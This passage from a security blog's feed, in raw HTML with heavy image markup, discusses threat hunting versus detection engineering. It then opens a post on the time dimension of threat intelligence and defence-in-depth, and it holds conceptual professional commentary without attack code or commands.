srcset="https://substackcdn.com/image/fetch/$s_!XufM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png 424w, https://substackcdn.com/image/fetch/$s_!XufM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png 848w, https://substackcdn.com/image/fetch/$s_!XufM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png 1272w, https://substackcdn.com/image/fetch/$s_!XufM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!XufM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png" width="2000" height="642" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:642,&quot;width&quot;:2000,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Threat Hunting vs Detection Engineering? The saga continues &#9973;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Threat Hunting vs Detection Engineering? The saga continues &#9973;" title="Threat Hunting vs Detection Engineering? The saga continues &#9973;" srcset="https://substackcdn.com/image/fetch/$s_!XufM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png 424w, https://substackcdn.com/image/fetch/$s_!XufM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png 848w, https://substackcdn.com/image/fetch/$s_!XufM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png 1272w, https://substackcdn.com/image/fetch/$s_!XufM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7018b53-5fb9-4576-bcab-6937a1901cff_2114x679.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I will expand on this pipeline in a future article because well... even I get tired of reading my own rumblings!</p><h2>The Several Misconceptions about Threat Hunting</h2><p>Many of the misconceptions about threat hunting arise from&nbsp;<em>looking at it with a "detection" lens</em>. This frames the conversation under wrong assumptions. Let's explore some of these assumptions.</p><h3>Hunt is underdeveloped Detection &#128679;</h3><p>Hunting is not "underdeveloped detection", lazy or fuzzy query logic, that's just the classic view that hasn't evolved from old times. This is applying a basic detection lens to the problem. If we consider&nbsp;<a href="https://www.nist.gov/system/files/documents/2023/08/07/CSF%202.0%20Core%20with%20Examples%20Discussion%20Draft%5B74%5D.pdf%5D?ref=quasarops.com">NISTv2 Framework</a>&nbsp;(Identify, Protect, Detect, Respond, Recover), Hunt doesn't simply sit under detective controls, but can actually be useful to improve Protective controls, certainly has a role to play during response and it greatly helps identify risks and threats. The reason is simple: "hunting" for threats is nothing more than implementing a structured approach to threat-driven cyber defence, which for the most part is heavily based on threat intel.</p><h3>Hunt is about "finding evil" &#128520;</h3><p>As I have written extensively for the last two years, and as captured in&nbsp;<a href="https://aimod2.com/docs/02-threat-hunting-missions/threat-hunting-outcomes/?ref=quasarops.com">aimod2</a>, hunt's findings can be of multiple types:</p><ul><li><p><strong>visibility gaps:</strong>&nbsp;logging or coverage deficiencies</p></li><li><p><strong>security control issues:</strong>&nbsp;lack of or weaknesses in protective, detective or mitigative controls</p></li><li><p><strong>detection opportunities:</strong>&nbsp;potential downstream artifacts consumable by detection engineering efforts</p></li><li><p><strong>suspicious security events:</strong>&nbsp;the stuff that leads to security incidents and your SOC or IR team getting involved</p></li><li><p><strong>intelligence events of interest:</strong>&nbsp;because hunt research can lead to enriching threat knowledge and threat actor profiling within your organization</p></li><li><p><strong>deception opportunities:</strong>&nbsp;points in the attack chain that are favourable to the deployment of lures and decoys in order to build deceptive narratives to elicit and direct threat actors down controlled attack paths</p></li></ul><p>All these findings constitute "risks" that need to be categorized according to your organization's risk framework.</p><p>It is extremely rare that a hunt mission will yield NONE of the findings listed above. And certainly, Hunt is not merely finding "hands-on keyboard" malicious activities.</p><h3>Hunting is about having random ideas and hypotheses &#127922;</h3><p>Threat Hunting is not just an analyst saying "I have an idea". It is about intel and an intel-driven pipeline with meticulous research and discovery.</p><p>When I say intel I mean an operative function that doesn't limit its focus to external threat actors and information provided by third parties about what's going on "in the wild", but a function that also understands that your environment is&nbsp;<strong>constantly radiating information</strong>&nbsp;that is raw data begging to be refined into insightful intel. And I'm not simply talking about your security incidents:</p><ul><li><p>Penetration Tests</p></li><li><p>Red Team engagements</p></li><li><p>Crown Jewel assessments</p></li><li><p>Security Incidents</p></li><li><p>Insider Threat information</p></li><li><p>Cyber Deception decoys, lures and breadcrumbs</p></li><li><p>Failed attempts and blocked attacks on your perimeter</p></li></ul><p>Threat Hunting should focus on implementing efficient research pipelines that bring insight from intel teams and extend, refine and enrich their work with operative environment knowledge.</p><h3>Threat Hunting is about Blue Team "stuff" only &#9732;&#65039;</h3><p>Who said hunting is merely the art of "crafting SIEM queries" or "finding evil and raising incidents"? Hunt is after a full-circle approach where adversarial engineering plays an important role. If you are not working with, or in the capacity of a purple team and you are not performing attack vector discovery (adversarial emulation and/or atomic testing), then you are only getting one side of the picture.</p><ul><li><p>Say you receive an external threat report that says an attacker was able to register an App in your Azure Entra ID tenant, an App that had the <code>AppRoleAssignment.ReadWrite.All</code> Graph permission. The threat actor was able to use it as a backdoor to assign any roles to attacker-controlled users. You don't know whether you could have been impacted by the same or similar attack chain.</p></li><li><p>So you searched your SIEM logs and Entra ID Audit Logs and couldn't find any hits? Is that all your hunt mission is about?</p></li><li><p>How about partnering with your Cloud Engineering Team/BU/SME to test this attack concept?</p></li><li><p>How about running the required PowerShell tools to understand your Azure tenant and your attack surface?</p></li><li><p>How about leveraging your pentest/purple/red team or the hunt team itself to run AzureHound and understand plausible attack paths?</p></li></ul><p>I hope you see where I'm going...</p><h3>Detection is Automated, Hunt is not &#128533;</h3><p>Detection Engineering has a heavy DevOps component to help automate the Testing and Deployment of detectors to test / prod environments. This is true of Detection, however, a well developed Hunt project also requires automation at some point of the workflow.</p><p>The main thing to automate in Threat Hunting is your research phase, you want to be able to produce semi-automated hunt packages:</p><ul><li><p>Using LLM to read and tag threat reports with MITRE TTPs</p></li><li><p>Using extracted data points like TTPs to search libraries of available signatures which can help kick off the hunt (SIGMA, KQL, YARA, SNORT, etc.). These are just starters for your hunt mission.</p></li><li><p>Utilize extracted data points to sweep GitHub in search for repositories that contain offensive or defensive tradecraft relating to your hunt topic.</p></li><li><p>Leveraging automation to sweep your Detection repository to identify existing coverage.</p></li><li><p>Use semantic searches to pre-search SIEM schemas in an attempt to identify the data collections or indexes that contain data that is meaningful for your hunt project.</p></li><li><p>Utilize all of the above information and the power of LLM to search for and build atomic red test devices to understand the adversarial aspect of your hunt.</p></li><li><p>Fetch and process your Threat Intel Platform data to surface pre-existing campaigns, threat actors or information that relates to your current mission.</p></li></ul><p>By the time the threat hunter receives the information, he/she/they receive a hunt package enriched with automation and allows for creative and more nuanced approaches.</p><h3>A Detection is an automated Hunt &#128550;&#129327;</h3><p>When you create a new detector as a result of a hunt mission, you are not crystalizing a hunt, you are simply capturing one of many outcomes of a hunt research project into an artifact meant for detection.</p><p>Hunt is not a process that can be "automated" end-to-end, it relies heavily on creative and lateral thinking, situational analysis, operative environment knowledge and deep system/forensics/network knowledge.</p><p>Perhaps one day, when Quantum Computing merges with ML and we start seeing AGI, hunt, detection, response and everything else will be automated and we can sit and watch how offensive and defensive AGIs fight each other! &#128569;</p><h2>Conclusion</h2><p>Perhaps you are now more confused than when you started reading! If you ask me, that's a good thing. Sometimes the only way to get out of rigid constructs that limit our way of looking at a problem is by redefining our coordinates.</p><p>In case some things are not clear, here's a summary of the points I've made:</p><ul><li><p><strong>&#10060; Ditch "Hunt vs. Detect vs. Intel vs. Whatever" as a way to think about your SecOps:</strong>&nbsp;Security functions are stages in a bigger threat-driven system, not competing roles.</p></li><li><p><strong>&#10004;&#65039; Focus on Problems, Not Labels:</strong>&nbsp;<em>What problems are you solving?</em>&nbsp;Start with threat-driven defence, this is your goal, don't start by asking people to define their job family and position description.</p></li><li><p><strong>&#10004;&#65039; Roles are functional boundaries, not rigid and clear-cut categories:</strong>&nbsp;"Hunter" or "Analyst" labels define focus areas, not inherent identities.</p></li><li><p><strong>&#10004;&#65039; Think beyond Roles, think Data, Knowledge and Insight:</strong>&nbsp;The key is crafting a powerful, data-driven threat defence system, we want to build data-driven pipelines to actively counter threats, you won't get there by merely contrasting "job descriptions".</p></li><li><p><strong>&#10004;&#65039; Embrace Interconnectedness:</strong>&nbsp;Lines between roles like analyst, engineer and responder are fuzzy, reflecting real-world overlap. Functions may overlap and feed into each other, creating crucial collaboration points.</p></li></ul>]]></content:encoded></item><item><title><![CDATA[The Uncertainty of Intelligence and the Entropy of Threats]]></title><description><![CDATA[In Part 1 of this series, we started to lay out the problem space and drew some di&#279;grams to get a better grasp of them.]]></description><link>https://www.quasarops.com/p/the-uncertainty-of-intelligence-and-the-entropy-of-threats</link><guid isPermaLink="false">https://www.quasarops.com/p/the-uncertainty-of-intelligence-and-the-entropy-of-threats</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Tue, 28 Nov 2023 07:26:36 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/9018c046-413c-480d-bd62-ac93830958e2_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Ooj1!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Ooj1!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!Ooj1!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!Ooj1!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!Ooj1!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Ooj1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Uncertainty of Intelligence and the Entropy of Threats&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Uncertainty of Intelligence and the Entropy of Threats" title="The Uncertainty of Intelligence and the Entropy of Threats" srcset="https://substackcdn.com/image/fetch/$s_!Ooj1!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!Ooj1!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!Ooj1!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!Ooj1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1a03aea8-a6f0-422d-8335-72b4ca1607bb_1024x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>In&nbsp;<a href="https://quasarops.com/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1/">Part 1</a>&nbsp;of this series, we started to lay out the problem space and drew some&nbsp;<em>di&#279;grams</em>&nbsp;to get a better grasp of them.</p><p>However, by merely looking at <strong>threat actionability zones</strong> we are obviating a very important aspect of threat management: <strong>the passing of time</strong>. Timely action can be the difference between&nbsp;<code>pwned</code>&nbsp;and&nbsp;<code>not-pwned</code>, between 5 million customer records held to ransom and nothing more than a noticeable event in your perimeter.</p><p><em>In Part 2 of this series, we will explore some eideons that I hope will contribute to developing a new understanding of the mechanics of threat information, intel, hunting and detection.</em></p><h1>Threat Intelligence and the Problem of Time</h1><p>Regardless of the strategic approach you choose to realize the value of threat intelligence, you implicitly work with three different time horizons:&nbsp;<em>threats that could impact us</em>&nbsp;(the future),&nbsp;<em>what can impact us right now based on our attack surface</em>&nbsp;(the present) and&nbsp;<em>what has impacted us already</em>&nbsp;(whether knowingly or unknowingly, the past).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0h3g!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0h3g!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg 424w, https://substackcdn.com/image/fetch/$s_!0h3g!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg 848w, https://substackcdn.com/image/fetch/$s_!0h3g!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg 1272w, https://substackcdn.com/image/fetch/$s_!0h3g!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0h3g!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg" width="631" height="766" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:766,&quot;width&quot;:631,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Uncertainty of Intelligence and the Entropy of Threats&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Uncertainty of Intelligence and the Entropy of Threats" title="The Uncertainty of Intelligence and the Entropy of Threats" srcset="https://substackcdn.com/image/fetch/$s_!0h3g!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg 424w, https://substackcdn.com/image/fetch/$s_!0h3g!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg 848w, https://substackcdn.com/image/fetch/$s_!0h3g!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg 1272w, https://substackcdn.com/image/fetch/$s_!0h3g!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F52d4243c-e861-4fe2-814a-995ec5dda285_631x766.svg 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The world is full of potential cyber threats, this doesn't mean they constitute likely threats to your business. Oh! I can now hear some of you going&nbsp;<em>"That's right! So you are now going to talk about the impact and likelihood risk matrix"</em>, ehem&#8230; no. That would be just repeating what everyone else out there vociferates like automaton robots.</p><p>There's nothing wrong with the "likelihood &amp; impact" matrix by the way, but the likelihood of some threat impacting business operations i<em>s merely a derived value</em>, the result of a deliberative process that has already&nbsp;<em>decided the final likelihood score</em>. How can you even arrive at that when most Cyber Ops teams struggle to capture the meaningful relationship between potential threats, their actionability gradients and the attack paths they enable in the environment?</p><p>Behind this confusion lies the concept of&nbsp;<code>defense-in-depth</code>: interspersed layers of defensive controls like a castle-and-moat model. If one layer is breached, there are additional layers to mitigate risks and prevent unauthorized access.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!XSuY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!XSuY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp 424w, https://substackcdn.com/image/fetch/$s_!XSuY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp 848w, https://substackcdn.com/image/fetch/$s_!XSuY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp 1272w, https://substackcdn.com/image/fetch/$s_!XSuY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!XSuY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp" width="1248" height="720" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:720,&quot;width&quot;:1248,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Uncertainty of Intelligence and the Entropy of Threats&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Uncertainty of Intelligence and the Entropy of Threats" title="The Uncertainty of Intelligence and the Entropy of Threats" srcset="https://substackcdn.com/image/fetch/$s_!XSuY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp 424w, https://substackcdn.com/image/fetch/$s_!XSuY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp 848w, https://substackcdn.com/image/fetch/$s_!XSuY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp 1272w, https://substackcdn.com/image/fetch/$s_!XSuY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99f40091-878a-498f-88b8-b7da2421e817_1248x720.webp 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>There is, however, one missing piece in the concept of defence-in-depth.&nbsp;<em>When we think of layers we evoke spatial references, but forget about the temporal layers: past, present and future</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!eT8C!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!eT8C!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png 424w, https://substackcdn.com/image/fetch/$s_!eT8C!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png 848w, https://substackcdn.com/image/fetch/$s_!eT8C!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png 1272w, 